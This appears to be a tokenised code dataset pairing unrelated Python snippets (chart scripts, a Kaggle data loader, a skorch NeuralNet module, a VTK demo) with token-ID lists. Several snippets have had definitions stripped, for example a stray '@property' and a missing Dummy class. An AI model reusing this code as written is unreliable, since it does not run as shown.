langs[lang] = 1
if COUNTRY in doc:
country = doc[COUNTRY]
if country:
if country in countries:
countries[country] += 1
else:
countries[country] = 1
chart = Highchart()
options = {TITLE : {TEXT : 'Results per Language'}}
chart.set_dict_options(options)
chart.add_data_set(langs.items(), series_type='pie', name='Results')
chart.save_file(splitext(argv[2])[0])
chart = Highchart()
options = {TITLE : {TEXT : 'Results per Country'}}
chart.set_dict_options(options)
chart.add_data_set(countries.items(), series_type='pie', name='Results')
chart.save_file(splitext(argv[3])[0])
| [
6738,
33918,
1330,
15989,
198,
6738,
28686,
13,
6978,
1330,
318,
7753,
11,
4328,
578,
742,
198,
6738,
25064,
1330,
1822,
85,
11,
8420,
198,
198,
6738,
1029,
354,
5889,
1330,
3334,
40926,
628,
198,
38715,
50,
220,
220,
220,
220,
796,
... | 2.572308 | 650 |
from PyQt5 import QtCore, QtWidgets
import sys
from multiprocessing import Process, Queue
from time import time
import vtk
from vtk.qt.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor
import numpy as np
from time import sleep
# Some other functions I toyed with before I got the vtk example working
if __name__ == '__main__':
app = QtWidgets.QApplication([])
window = DemoGui()
window.show()
app.exec_()
| [
198,
198,
6738,
9485,
48,
83,
20,
1330,
33734,
14055,
11,
33734,
54,
312,
11407,
198,
11748,
25064,
198,
6738,
18540,
305,
919,
278,
1330,
10854,
11,
4670,
518,
198,
6738,
640,
1330,
640,
198,
11748,
410,
30488,
198,
6738,
410,
30488,... | 3.020408 | 147 |
import os
import pandas as pd
from tqdm import tqdm
if os.environ.get("USER") == "ian":
ROOT = "/home/ian/data/kaggle/optiver_volatility/"
else:
ROOT = "/kaggle/input/optiver-realized-volatility-prediction"
print(f"Utility says ROOT is {ROOT}")
TRAIN_CSV = os.path.join(ROOT, "train.csv")
TEST_CSV = os.path.join(ROOT, "test.csv")
def get_data(verbose=True, stock_ids=None):
"""stock_ids can be None (uses 0..9 by default) or 'all' for all
stocks or a specified list of numeric ids"""
items_in_folder = os.listdir(os.path.join(ROOT, "book_train.parquet"))
if verbose:
print(
f"""There are {len(items_in_folder)} items in the folder"""
"""and they look like {items_in_folder[:5]}"""
)
# if stock_ids == 'all':
# 1/0
# #stock_ids = range(127) # not a contiguous range!
# #stock_ids = get_training_stock_ids()
# if not stock_ids:
# stock_ids = range(10) # [0..126] files in the total set
if True:
# memory efficient but needs to load everything!
stock_filenames = []
#for stock_id in tqdm(stock_ids):
# assert isinstance(stock_id, int)
# stock_filenames.append(os.path.join(ROOT, f"book_train.parquet/stock_id={stock_id}"))
df_book_train = pd.read_parquet(os.path.join(ROOT, "book_train.parquet"))
if False:
df_book_trains = []
for stock_id in tqdm(stock_ids):
assert isinstance(stock_id, int)
df_book_train_stock_X = pd.read_parquet(
os.path.join(ROOT, f"book_train.parquet/stock_id={stock_id}")
)
df_book_train_stock_X["stock_id"] = stock_id
df_book_trains.append(df_book_train_stock_X)
#df_book_train = pd.concat(df_book_trains)
df_book_train = pd.concat(df_book_trains, copy=False)
if False:
df_book_train = None
for stock_id in tqdm(stock_ids):
assert isinstance(stock_id, int)
df_book_train_stock_X = pd.read_parquet(
os.path.join(ROOT, f"book_train.parquet/stock_id={stock_id}")
)
df_book_train_stock_X["stock_id"] = stock_id
if df_book_train is None:
df_book_train = df_book_train_stock_X
else:
df_book_train = pd.concat((df_book_train, df_book_train_stock_X),)
if False:
# doesn't even finish...
from dask.distributed import Client
if 'client' not in dir():
# useful for Pandas - no threads (Pandas not GIL-friendly), many processes
# and enough memory to not max out my laptop
client = Client(processes=True, n_workers=2,
threads_per_worker=1, memory_limit='10GB')
print(client) # show client details
import dask.dataframe as dd
ddf = dd.read_parquet(path=os.path.join(ROOT, 'book_train.parquet'))
df_book_train = ddf.compute()
if verbose:
print(
f"Loaded {df_book_train.shape[0]:,} rows for book_train on {len(stock_ids)} stock_ids"
)
df_train_all = pd.read_csv(TRAIN_CSV)
training_rows_was = df_train_all.shape[0]
df_train_all = df_train_all.query("stock_id in @stock_ids")
training_rows_is = df_train_all.shape[0]
if training_rows_was != training_rows_is:
print(f"**** Had {training_rows_was:,} rows, now we have {training_rows_is:,}")
else:
print("Kept all training rows during get_data")
return df_train_all, df_book_train
| [
11748,
28686,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
198,
361,
28686,
13,
268,
2268,
13,
1136,
7203,
29904,
4943,
6624,
366,
666,
1298,
198,
220,
220,
220,
15107,
2394,
796,
12813,
... | 2.072863 | 1,743 |
n = int(input('digite um número:'))
d = n * 2
t = n * 3
r = n ** (1/2)
print ('o dobro de {} é {} o triplo {} e a raiz quadrada é {:.0f}'.format(n,d,t,r))
| [
77,
796,
493,
7,
15414,
10786,
12894,
578,
23781,
299,
21356,
647,
78,
32105,
4008,
220,
198,
67,
796,
299,
1635,
362,
198,
83,
796,
299,
1635,
513,
198,
81,
796,
299,
12429,
357,
16,
14,
17,
8,
198,
4798,
19203,
78,
466,
7957,
... | 2 | 78 |
'''
Created by auto_sdk on 2015.11.25
'''
from aliyun.api.base import RestApi
| [
7061,
6,
201,
198,
41972,
416,
8295,
62,
21282,
74,
319,
1853,
13,
1157,
13,
1495,
201,
198,
7061,
6,
201,
198,
6738,
435,
7745,
403,
13,
15042,
13,
8692,
1330,
8324,
32,
14415,
201,
198
] | 2.277778 | 36 |
import numpy as np
| [
198,
11748,
299,
32152,
355,
45941,
198
] | 2.857143 | 7 |
"""Neural net classes."""
import fnmatch
from itertools import chain
from functools import partial
import re
import tempfile
import warnings
import numpy as np
from sklearn.base import BaseEstimator
import torch
from torch.utils.data import DataLoader
from skorch.callbacks import EpochTimer
from skorch.callbacks import PrintLog
from skorch.callbacks import EpochScoring
from skorch.callbacks import BatchScoring
from skorch.dataset import Dataset
from skorch.dataset import CVSplit
from skorch.dataset import get_len
from skorch.exceptions import DeviceWarning
from skorch.exceptions import NotInitializedError
from skorch.history import History
from skorch.utils import duplicate_items
from skorch.utils import get_dim
from skorch.utils import is_dataset
from skorch.utils import to_numpy
from skorch.utils import to_tensor
from skorch.utils import params_for
# pylint: disable=unused-argument
# pylint: disable=unused-argument
# pylint: disable=too-many-instance-attributes
class NeuralNet(object):
# pylint: disable=anomalous-backslash-in-string
"""NeuralNet base class.
The base class covers more generic cases. Depending on your use
case, you might want to use ``NeuralNetClassifier`` or
``NeuralNetRegressor``.
In addition to the parameters listed below, there are parameters
with specific prefixes that are handled separately. To illustrate
this, here is an example:
>>> net = NeuralNet(
... ...,
... optimizer=torch.optimizer.SGD,
... optimizer__momentum=0.95,
...)
This way, when ``optimizer`` is initialized, ``NeuralNet`` will
take care of setting the ``momentum`` parameter to 0.95.
(Note that the double underscore notation in
``optimizer__momentum`` means that the parameter ``momentum``
should be set on the object ``optimizer``. This is the same
semantic as used by sklearn.)
Furthermore, this allows to change those parameters later:
``net.set_params(optimizer__momentum=0.99)``
This can be useful when you want to change certain parameters
using a callback, when using the net in an sklearn grid search,
etc.
By default an ``EpochTimer``, ``AverageLoss``, ``BestLoss``, and
``PrintLog`` callback is installed for the user's convenience.
Parameters
----------
module : torch module (class or instance)
A torch module. In general, the uninstantiated class should be
passed, although instantiated modules will also work.
criterion : torch criterion (class)
The uninitialized criterion (loss) used to optimize the
module.
optimizer : torch optim (class, default=torch.optim.SGD)
The uninitialized optimizer (update rule) used to optimize the
module
lr : float (default=0.01)
Learning rate passed to the optimizer. You may use ``lr`` instead
of using ``optimizer__lr``, which would result in the same outcome.
max_epochs : int (default=10)
The number of epochs to train for each ``fit`` call. Note that you
may keyboard-interrupt training at any time.
batch_size : int (default=128)
Mini-batch size. Use this instead of setting
``iterator_train__batch_size`` and ``iterator_test__batch_size``,
which would result in the same outcome.
iterator_train : torch DataLoader
The default ``torch.utils.data.DataLoader`` used for training
data.
iterator_valid : torch DataLoader
The default ``torch.utils.data.DataLoader`` used for validation
and test data, i.e. during inference.
dataset : torch Dataset (default=skorch.dataset.Dataset)
The dataset is necessary for the incoming data to work with
pytorch's ``DataLoader``. It has to implement the ``__len__`` and
``__getitem__`` methods. The provided dataset should be capable of
dealing with a lot of data types out of the box, so only change
this if your data is not supported. Additionally, dataset should
accept a ``device`` parameter to indicate the location of the
data (e.g., CUDA).
You should generally pass the uninitialized ``Dataset`` class
and define additional arguments to X and y by prefixing them
with ``dataset__``. It is also possible to pass an initialzed
``Dataset``, in which case no additional arguments may be
passed.
train_split : None or callable (default=skorch.dataset.CVSplit(5))
If None, there is no train/validation split. Else, train_split
should be a function or callable that is called with X and y
data and should return the tuple ``X_train, X_valid, y_train,
y_valid``. The validation data may be None.
callbacks : None or list of Callback instances (default=None)
More callbacks, in addition to those returned by
``get_default_callbacks``. Each callback should inherit from
skorch.Callback. If not None, a list of tuples (name, callback)
should be passed, where names should be unique. Callbacks may or
may not be instantiated.
Alternatively, it is possible to just pass a list of callbacks,
which results in names being inferred from the class name.
The callback name can be used to set parameters on specific
callbacks (e.g., for the callback with name ``'print_log'``, use
``net.set_params(callbacks__print_log__keys=['epoch',
'train_loss'])``).
warm_start : bool (default=False)
Whether each fit call should lead to a re-initialization of the
module (cold start) or whether the module should be trained
further (warm start).
verbose : int (default=1)
Control the verbosity level.
device : str, torch.device (default='cpu')
The compute device to be used. If set to 'cuda', data in torch
tensors will be pushed to cuda tensors before being sent to the
module.
Attributes
----------
prefixes\_ : list of str
Contains the prefixes to special parameters. E.g., since there
is the ``'module'`` prefix, it is possible to set parameters like
so: ``NeuralNet(..., optimizer__momentum=0.95)``.
cuda_dependent_attributes\_ : list of str
Contains a list of all attributes whose values depend on a CUDA
device. If a ``NeuralNet`` trained with a CUDA-enabled device is
unpickled on a machine without CUDA or with CUDA disabled, the
listed attributes are mapped to CPU. Expand this list if you
want to add other cuda-dependent attributes.
initialized\_ : bool
Whether the NeuralNet was initialized.
module\_ : torch module (instance)
The instantiated module.
criterion\_ : torch criterion (instance)
The instantiated criterion.
callbacks\_ : list of tuples
The complete (i.e. default and other), initialized callbacks, in
a tuple with unique names.
"""
prefixes_ = ['module', 'iterator_train', 'iterator_valid', 'optimizer',
'criterion', 'callbacks', 'dataset']
cuda_dependent_attributes_ = ['module_', 'optimizer_']
# pylint: disable=too-many-arguments
@property
def notify(self, method_name, **cb_kwargs):
"""Call the callback method specified in ``method_name`` with
parameters specified in ``cb_kwargs``.
Method names can be one of:
* on_train_begin
* on_train_end
* on_epoch_begin
* on_epoch_end
* on_batch_begin
* on_batch_end
"""
getattr(self, method_name)(self, **cb_kwargs)
for _, cb in self.callbacks_:
getattr(cb, method_name)(self, **cb_kwargs)
# pylint: disable=unused-argument
# pylint: disable=unused-argument
# pylint: disable=unused-argument
# pylint: disable=unused-argument
# pylint: disable=unused-argument
def _yield_callbacks(self):
"""Yield all callbacks set on this instance.
Handles these cases:
* default and user callbacks
* callbacks with and without name
* initialized and uninitialized callbacks
* puts PrintLog(s) last
"""
print_logs = []
for item in self.get_default_callbacks() + (self.callbacks or []):
if isinstance(item, (tuple, list)):
name, cb = item
else:
cb = item
if isinstance(cb, type): # uninitialized:
name = cb.__name__
else:
name = cb.__class__.__name__
if isinstance(cb, PrintLog) or (cb == PrintLog):
print_logs.append((name, cb))
else:
yield name, cb
yield from print_logs
def initialize_callbacks(self):
"""Initializes all callbacks and save the result in the
``callbacks_`` attribute.
Both ``default_callbacks`` and ``callbacks`` are used (in that
order). Callbacks may either be initialized or not, and if
they don't have a name, the name is inferred from the class
name. The ``initialize`` method is called on all callbacks.
The final result will be a list of tuples, where each tuple
consists of a name and an initialized callback. If names are
not unique, a ValueError is raised.
"""
names_seen = set()
callbacks_ = []
for name, cb in self._yield_callbacks():
if name in names_seen:
raise ValueError("The callback name '{}' appears more than "
"once.".format(name))
names_seen.add(name)
# check if callback itself is changed
param_callback = getattr(self, 'callbacks__' + name, Dummy)
if param_callback is not Dummy: # callback itself was set
cb = param_callback
# below: check for callback params
# don't set a parameter for non-existing callback
params = self._get_params_for('callbacks__{}'.format(name))
if (cb is None) and params:
raise ValueError("Trying to set a parameter for callback {} "
"which does not exist.".format(name))
if cb is None:
continue
if isinstance(cb, type): # uninitialized:
cb = cb(**params)
else:
cb.set_params(**params)
cb.initialize()
callbacks_.append((name, cb))
self.callbacks_ = callbacks_
return self
def initialize_criterion(self):
"""Initializes the criterion."""
criterion_params = self._get_params_for('criterion')
self.criterion_ = self.criterion(**criterion_params)
return self
def initialize_module(self):
"""Initializes the module.
Note that if the module has learned parameters, those will be
reset.
"""
kwargs = self._get_params_for('module')
module = self.module
is_initialized = isinstance(module, torch.nn.Module)
if kwargs or not is_initialized:
if is_initialized:
module = type(module)
if is_initialized or self.initialized_:
if self.verbose:
print("Re-initializing module!")
module = module(**kwargs)
self.module_ = module.to(self.device)
return self
def initialize_optimizer(self):
"""Initialize the model optimizer. If ``self.optimizer__lr``
is not set, use ``self.lr`` instead.
"""
args, kwargs = self._get_params_for_optimizer(
'optimizer', self.module_.named_parameters())
if 'lr' not in kwargs:
kwargs['lr'] = self.lr
self.optimizer_ = self.optimizer(*args, **kwargs)
def initialize_history(self):
"""Initializes the history."""
self.history = History()
def initialize(self):
"""Initializes all components of the NeuralNet and returns
self.
"""
self.initialize_callbacks()
self.initialize_criterion()
self.initialize_module()
self.initialize_optimizer()
self.initialize_history()
self.initialized_ = True
return self
def validation_step(self, Xi, yi, **fit_params):
"""Perform a forward step using batched data and return the
resulting loss.
The module is set to be in evaluation mode (e.g. dropout is
not applied).
Parameters
----------
Xi : input data
A batch of the input data.
yi : target data
A batch of the target data.
**fit_params : dict
Additional parameters passed to the ``forward`` method of
the module and to the train_split call.
"""
self.module_.eval()
y_pred = self.infer(Xi, **fit_params)
loss = self.get_loss(y_pred, yi, X=Xi, training=False)
return {
'loss': loss,
'y_pred': y_pred,
}
def train_step(self, Xi, yi, **fit_params):
"""Perform a forward step using batched data, update module
parameters, and return the loss.
The module is set to be in train mode (e.g. dropout is
applied).
Parameters
----------
Xi : input data
A batch of the input data.
yi : target data
A batch of the target data.
**fit_params : dict
Additional parameters passed to the ``forward`` method of
the module and to the train_split call.
"""
self.module_.train()
self.optimizer_.zero_grad()
y_pred = self.infer(Xi, **fit_params)
loss = self.get_loss(y_pred, yi, X=Xi, training=True)
loss.backward()
self.notify(
'on_grad_computed',
named_parameters=list(self.module_.named_parameters())
)
self.optimizer_.step()
return {
'loss': loss,
'y_pred': y_pred,
}
def evaluation_step(self, Xi, training=False):
"""Perform a forward step to produce the output used for
prediction and scoring.
Therefore the module is set to evaluation mode by default
beforehand which can be overridden to re-enable features
like dropout by setting ``training=True``.
"""
self.module_.train(training)
return self.infer(Xi)
def fit_loop(self, X, y=None, epochs=None, **fit_params):
"""The proper fit loop.
Contains the logic of what actually happens during the fit
loop.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
y : target data, compatible with skorch.dataset.Dataset
The same data types as for ``X`` are supported. If your X is
a Dataset that contains the target, ``y`` may be set to
None.
epochs : int or None (default=None)
If int, train for this number of epochs; if None, use
``self.max_epochs``.
**fit_params : dict
Additional parameters passed to the ``forward`` method of
the module and to the train_split call.
"""
self.check_data(X, y)
epochs = epochs if epochs is not None else self.max_epochs
dataset_train, dataset_valid = self.get_split_datasets(
X, y, **fit_params)
on_epoch_kwargs = {
'dataset_train': dataset_train,
'dataset_valid': dataset_valid,
}
for _ in range(epochs):
self.notify('on_epoch_begin', **on_epoch_kwargs)
for Xi, yi in self.get_iterator(dataset_train, training=True):
self.notify('on_batch_begin', X=Xi, y=yi, training=True)
step = self.train_step(Xi, yi, **fit_params)
self.history.record_batch(
'train_loss', step['loss'].data.item())
self.history.record_batch('train_batch_size', get_len(Xi))
self.notify('on_batch_end', X=Xi, y=yi, training=True, **step)
if dataset_valid is None:
self.notify('on_epoch_end', **on_epoch_kwargs)
continue
for Xi, yi in self.get_iterator(dataset_valid, training=False):
self.notify('on_batch_begin', X=Xi, y=yi, training=False)
step = self.validation_step(Xi, yi, **fit_params)
self.history.record_batch(
'valid_loss', step['loss'].data.item())
self.history.record_batch('valid_batch_size', get_len(Xi))
self.notify('on_batch_end', X=Xi, y=yi, training=False, **step)
self.notify('on_epoch_end', **on_epoch_kwargs)
return self
# pylint: disable=unused-argument
def partial_fit(self, X, y=None, classes=None, **fit_params):
"""Fit the module.
If the module is initialized, it is not re-initialized, which
means that this method should be used if you want to continue
training a model (warm start).
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
y : target data, compatible with skorch.dataset.Dataset
The same data types as for ``X`` are supported. If your X is
a Dataset that contains the target, ``y`` may be set to
None.
classes : array, sahpe (n_classes,)
Solely for sklearn compatibility, currently unused.
**fit_params : dict
Additional parameters passed to the ``forward`` method of
the module and to the train_split call.
"""
if not self.initialized_:
self.initialize()
self.notify('on_train_begin')
try:
self.fit_loop(X, y, **fit_params)
except KeyboardInterrupt:
pass
self.notify('on_train_end')
return self
def fit(self, X, y=None, **fit_params):
"""Initialize and fit the module.
If the module was already initialized, by calling fit, the
module will be re-initialized (unless ``warm_start`` is True).
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
y : target data, compatible with skorch.dataset.Dataset
The same data types as for ``X`` are supported. If your X is
a Dataset that contains the target, ``y`` may be set to
None.
**fit_params : dict
Additional parameters passed to the ``forward`` method of
the module and to the train_split call.
"""
if not self.warm_start or not self.initialized_:
self.initialize()
self.partial_fit(X, y, **fit_params)
return self
def forward_iter(self, X, training=False, device='cpu'):
"""Yield outputs of module forward calls on each batch of data.
The storage device of the yielded tensors is determined
by the ``device`` parameter.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
training : bool (default=False)
Whether to set the module to train mode or not.
device : string (default='cpu')
The device to store each inference result on.
This defaults to CPU memory since there is genereally
more memory available there. For performance reasons
this might be changed to a specific CUDA device,
e.g. 'cuda:0'.
Yields
------
yp : torch tensor
Result from a forward call on an individual batch.
"""
dataset = X if is_dataset(X) else self.get_dataset(X)
iterator = self.get_iterator(dataset, training=training)
for Xi, _ in iterator:
yp = self.evaluation_step(Xi, training=training)
if isinstance(yp, tuple):
yield tuple(n.to(device) for n in yp)
else:
yield yp.to(device)
def forward(self, X, training=False, device='cpu'):
"""Gather and concatenate the output from forward call with
input data.
The outputs from ``self.module_.forward`` are gathered on the
compute device specified by ``device`` and then concatenated
using ``torch.cat``. If multiple outputs are returned by
``self.module_.forward``, each one of them must be able to be
concatenated this way.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
training : bool (default=False)
Whether to set the module to train mode or not.
device : string (default='cpu')
The device to store each inference result on.
This defaults to CPU memory since there is genereally
more memory available there. For performance reasons
this might be changed to a specific CUDA device,
e.g. 'cuda:0'.
Returns
-------
y_infer : torch tensor
The result from the forward step.
"""
y_infer = list(self.forward_iter(X, training=training, device=device))
is_multioutput = len(y_infer) > 0 and isinstance(y_infer[0], tuple)
if is_multioutput:
return tuple(map(torch.cat, zip(*y_infer)))
return torch.cat(y_infer)
def infer(self, x, **fit_params):
"""Perform a single inference step on a batch of data.
Parameters
----------
x : input data
A batch of the input data.
**fit_params : dict
Additional parameters passed to the ``forward`` method of
the module and to the train_split call.
"""
x = to_tensor(x, device=self.device)
if isinstance(x, dict):
x_dict = self._merge_x_and_fit_params(x, fit_params)
return self.module_(**x_dict)
return self.module_(x, **fit_params)
def predict_proba(self, X):
"""Return the output of the module's forward method as a numpy
array.
If forward returns multiple outputs as a tuple, it is assumed
that the first output contains the relevant information. The
other values are ignored.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
Returns
-------
y_proba : numpy ndarray
"""
y_probas = []
for yp in self.forward_iter(X, training=False):
yp = yp[0] if isinstance(yp, tuple) else yp
y_probas.append(to_numpy(yp))
y_proba = np.concatenate(y_probas, 0)
return y_proba
def predict(self, X):
"""Where applicable, return class labels for samples in X.
If the module's forward method returns multiple outputs as a
tuple, it is assumed that the first output contains the
relevant information. The other values are ignored.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
Returns
-------
y_pred : numpy ndarray
"""
return self.predict_proba(X)
# pylint: disable=unused-argument
def get_loss(self, y_pred, y_true, X=None, training=False):
"""Return the loss for this batch.
Parameters
----------
y_pred : torch tensor
Predicted target values
y_true : torch tensor
True target values.
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
train : bool (default=False)
Whether train mode should be used or not.
"""
y_true = to_tensor(y_true, device=self.device)
return self.criterion_(y_pred, y_true)
def get_dataset(self, X, y=None):
"""Get a dataset that contains the input data and is passed to
the iterator.
Override this if you want to initialize your dataset
differently.
If ``dataset__device`` is not set, use ``self.device`` instead.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
y : target data, compatible with skorch.dataset.Dataset
The same data types as for ``X`` are supported. If your X is
a Dataset that contains the target, ``y`` may be set to
None.
Returns
-------
dataset
The initialized dataset.
"""
if is_dataset(X):
return X
dataset = self.dataset
is_initialized = not callable(dataset)
kwargs = self._get_params_for('dataset')
if kwargs and is_initialized:
raise TypeError("Trying to pass an initialized Dataset while "
"passing Dataset arguments ({}) is not "
"allowed.".format(kwargs))
if is_initialized:
return dataset
if 'device' not in kwargs:
kwargs['device'] = self.device
return dataset(X, y, **kwargs)
def get_split_datasets(self, X, y=None, **fit_params):
"""Get internal train and validation datasets.
The validation dataset can be None if ``self.train_split`` is
set to None; then internal validation will be skipped.
Override this if you want to change how the net splits
incoming data into train and validation part.
Parameters
----------
X : input data, compatible with skorch.dataset.Dataset
By default, you should be able to pass:
* numpy arrays
* torch tensors
* pandas DataFrame or Series
* a dictionary of the former three
* a list/tuple of the former three
* a Dataset
If this doesn't work with your data, you have to pass a
``Dataset`` that can deal with the data.
y : target data, compatible with skorch.dataset.Dataset
The same data types as for ``X`` are supported. If your X is
a Dataset that contains the target, ``y`` may be set to
None.
**fit_params : dict
Additional parameters passed to the train_split call.
Returns
-------
dataset_train
The initialized training dataset.
dataset_valid
The initialized validation dataset or None
"""
dataset = self.get_dataset(X, y)
if self.train_split:
dataset_train, dataset_valid = self.train_split(
dataset, y, **fit_params)
else:
dataset_train, dataset_valid = dataset, None
return dataset_train, dataset_valid
def get_iterator(self, dataset, training=False):
"""Get an iterator that allows to loop over the batches of the
given data.
If ``self.iterator_train__batch_size`` and/or
``self.iterator_test__batch_size`` are not set, use
``self.batch_size`` instead.
Parameters
----------
dataset : torch Dataset (default=skorch.dataset.Dataset)
Usually, ``self.dataset``, initialized with the corresponding
data, is passed to ``get_iterator``.
training : bool (default=False)
Whether to use ``iterator_train`` or ``iterator_test``.
Returns
-------
iterator
An instantiated iterator that allows to loop over the
mini-batches.
"""
if training:
kwargs = self._get_params_for('iterator_train')
iterator = self.iterator_train
else:
kwargs = self._get_params_for('iterator_valid')
iterator = self.iterator_valid
if 'batch_size' not in kwargs:
kwargs['batch_size'] = self.batch_size
return iterator(dataset, **kwargs)
def _get_params_for_optimizer(self, prefix, named_parameters):
"""Parse kwargs configuration for the optimizer identified by
the given prefix. Supports param group assignment using wildcards:
optimizer__lr=0.05,
optimizer__param_groups=[
('rnn*.period', {'lr': 0.3, 'momentum': 0}),
('rnn0', {'lr': 0.1}),
]
The first positional argument are the param groups.
"""
kwargs = self._get_params_for(prefix)
params = list(named_parameters)
pgroups = []
for pattern, group in kwargs.pop('param_groups', []):
matches = [i for i, (name, _) in enumerate(params) if
fnmatch.fnmatch(name, pattern)]
if matches:
p = [params.pop(i)[1] for i in reversed(matches)]
pgroups.append({'params': p, **group})
if params:
pgroups.append({'params': [p for _, p in params]})
return [pgroups], kwargs
def _get_params_callbacks(self, deep=True):
"""sklearn's .get_params checks for `hasattr(value,
'get_params')`. This returns False for a list. But our
callbacks reside within a list. Hence their parameters have to
be retrieved separately.
"""
params = {}
if not deep:
return params
callbacks_ = getattr(self, 'callbacks_', [])
for key, val in chain(callbacks_, self._default_callbacks):
name = 'callbacks__' + key
params[name] = val
if val is None: # callback deactivated
continue
for subkey, subval in val.get_params().items():
subname = name + '__' + subkey
params[subname] = subval
return params
# XXX remove once deprecation for use_cuda is phased out
# Also remember to update NeuralNet docstring
def set_params(self, **kwargs):
"""Set the parameters of this class.
Valid parameter keys can be listed with ``get_params()``.
Returns
-------
self
"""
self._check_deprecated_params(**kwargs)
normal_params, cb_params, special_params = {}, {}, {}
for key, val in kwargs.items():
if key.startswith('callbacks'):
cb_params[key] = val
elif any(key.startswith(prefix) for prefix in self.prefixes_):
special_params[key] = val
else:
normal_params[key] = val
BaseEstimator.set_params(self, **normal_params)
for key, val in special_params.items():
if key.endswith('_'):
raise ValueError("Not sure: Should this ever happen?")
else:
setattr(self, key, val)
if cb_params:
# callbacks need special treatmeant since they are list of tuples
self.initialize_callbacks()
self._set_params_callback(**cb_params)
if any(key.startswith('criterion') for key in special_params):
self.initialize_criterion()
if any(key.startswith('module') for key in special_params):
self.initialize_module()
self.initialize_optimizer()
if any(key.startswith('optimizer') for key in special_params):
# Model selectors such as GridSearchCV will set the
# parameters before .initialize() is called, therefore we
# need to make sure that we have an initialized model here
# as the optimizer depends on it.
if not hasattr(self, 'module_'):
self.initialize_module()
self.initialize_optimizer()
vars(self).update(kwargs)
return self
def save_params(self, f):
"""Save only the module's parameters, not the whole object.
To save the whole object, use pickle.
Parameters
----------
f : file-like object or str
See ``torch.save`` documentation.
Examples
--------
>>> before = NeuralNetClassifier(mymodule)
>>> before.save_params('path/to/file')
>>> after = NeuralNetClassifier(mymodule).initialize()
>>> after.load_params('path/to/file')
"""
if not hasattr(self, 'module_'):
raise NotInitializedError(
"Cannot save parameters of an un-initialized model. "
"Please initialize first by calling .initialize() "
"or by fitting the model with .fit(...).")
torch.save(self.module_.state_dict(), f)
def load_params(self, f):
"""Load only the module's parameters, not the whole object.
To save and load the whole object, use pickle.
Parameters
----------
f : file-like object or str
See ``torch.load`` documentation.
Examples
--------
>>> before = NeuralNetClassifier(mymodule)
>>> before.save_params('path/to/file')
>>> after = NeuralNetClassifier(mymodule).initialize()
>>> after.load_params('path/to/file')
"""
if not hasattr(self, 'module_'):
raise NotInitializedError(
"Cannot load parameters of an un-initialized model. "
"Please initialize first by calling .initialize() "
"or by fitting the model with .fit(...).")
use_cuda = self.device.startswith('cuda')
cuda_req_not_met = (use_cuda and not torch.cuda.is_available())
if use_cuda or cuda_req_not_met:
# Eiher we want to load the model to the CPU in which case
# we are loading in a way where it doesn't matter if the data
# was on the GPU or not or the model was on the GPU but there
# is no CUDA device available.
if cuda_req_not_met:
warnings.warn(
"Model configured to use CUDA but no CUDA devices "
"available. Loading on CPU instead.",
ResourceWarning)
self.device = 'cpu'
model = torch.load(f, lambda storage, loc: storage)
else:
model = torch.load(f)
self.module_.load_state_dict(model)
#######################
# NeuralNetClassifier #
#######################
neural_net_clf_doc_start = """NeuralNet for classification tasks
Use this specifically if you have a standard classification task,
with input data X and target y.
"""
neural_net_clf_criterion_text = """
criterion : torch criterion (class, default=torch.nn.NLLLoss)
Negative log likelihood loss. Note that the module should return
probabilities, the log is applied during ``get_loss``."""
# pylint: disable=missing-docstring
######################
# NeuralNetRegressor #
######################
neural_net_reg_doc_start = """NeuralNet for regression tasks
Use this specifically if you have a standard regression task,
with input data X and target y. y must be 2d.
"""
neural_net_reg_criterion_text = """
criterion : torch criterion (class, default=torch.nn.MSELoss)
Mean squared error loss."""
# pylint: disable=missing-docstring
| [
37811,
8199,
1523,
2010,
6097,
526,
15931,
198,
198,
11748,
24714,
15699,
198,
6738,
340,
861,
10141,
1330,
6333,
198,
6738,
1257,
310,
10141,
1330,
13027,
198,
11748,
302,
198,
11748,
20218,
7753,
198,
11748,
14601,
198,
198,
11748,
299,... | 2.380154 | 16,225 |
# -*- coding: UTF-8 -*-
#Colours Defined Variables
W = '\033[1;37m'
N = '\033[0m'
R="\033[1;37m\033[31m"
B = '\033[1;37m\033[34m'
G = '\033[1;32m'
Y = '\033[1;33;40m'
#Decorators
